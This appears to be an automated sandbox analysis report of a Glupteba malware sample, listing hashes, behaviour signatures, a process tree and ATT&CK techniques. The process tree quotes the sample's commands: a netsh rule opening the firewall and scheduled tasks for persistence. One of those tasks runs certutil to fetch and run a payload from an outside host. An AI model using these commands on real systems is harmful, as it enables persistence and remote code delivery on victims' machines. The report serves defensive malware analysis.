Analysis

  • max time kernel
    139s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    08-07-2022 08:20

General

  • Target

    713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f.exe

  • Size

    4.2MB

  • MD5

    649193ad2480b42356f8a3510b97f380

  • SHA1

    ce91fb0c24a8bb7bb6e2c6cd17cf797a8ddd8886

  • SHA256

    713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f

  • SHA512

    652e89159b685418c402937264b607f27fc509a36924813bc8f3dd426e281dd3c804092938b81039d3ab7228d21d543e4b34a7739be013e1f721d75e8bf91860

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f.exe
    "C:\Users\Admin\AppData\Local\Temp\713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4828
    • C:\Users\Admin\AppData\Local\Temp\713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f.exe
      "C:\Users\Admin\AppData\Local\Temp\713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:480
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:2056
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:3160
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:3404
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:4824
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2188
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4972

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    649193ad2480b42356f8a3510b97f380

    SHA1

    ce91fb0c24a8bb7bb6e2c6cd17cf797a8ddd8886

    SHA256

    713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f

    SHA512

    652e89159b685418c402937264b607f27fc509a36924813bc8f3dd426e281dd3c804092938b81039d3ab7228d21d543e4b34a7739be013e1f721d75e8bf91860

  • C:\Windows\rss\csrss.exe
    Filesize

    4.2MB

    MD5

    649193ad2480b42356f8a3510b97f380

    SHA1

    ce91fb0c24a8bb7bb6e2c6cd17cf797a8ddd8886

    SHA256

    713030a09e78962d6f12c3924adef8d4275733e4579a60b7e985f864df49230f

    SHA512

    652e89159b685418c402937264b607f27fc509a36924813bc8f3dd426e281dd3c804092938b81039d3ab7228d21d543e4b34a7739be013e1f721d75e8bf91860

  • memory/480-145-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/480-134-0x0000000000000000-mapping.dmp
  • memory/480-137-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/480-138-0x000000000543C000-0x00000000057E3000-memory.dmp
    Filesize

    3.7MB

  • memory/480-141-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/2056-140-0x0000000000000000-mapping.dmp
  • memory/2188-153-0x0000000000000000-mapping.dmp
  • memory/2840-148-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/2840-147-0x0000000005800000-0x0000000005BA7000-memory.dmp
    Filesize

    3.7MB

  • memory/2840-142-0x0000000000000000-mapping.dmp
  • memory/2840-155-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/2840-154-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/2840-146-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/3160-149-0x0000000000000000-mapping.dmp
  • memory/3404-150-0x0000000000000000-mapping.dmp
  • memory/4340-139-0x0000000000000000-mapping.dmp
  • memory/4824-151-0x0000000000000000-mapping.dmp
  • memory/4828-130-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/4828-133-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB

  • memory/4828-132-0x0000000005426000-0x00000000057CD000-memory.dmp
    Filesize

    3.7MB

  • memory/4828-131-0x00000000057D0000-0x0000000005EC6000-memory.dmp
    Filesize

    7.0MB

  • memory/4828-135-0x00000000057D0000-0x0000000005EC6000-memory.dmp
    Filesize

    7.0MB

  • memory/4828-136-0x0000000000400000-0x0000000004D4C000-memory.dmp
    Filesize

    73.3MB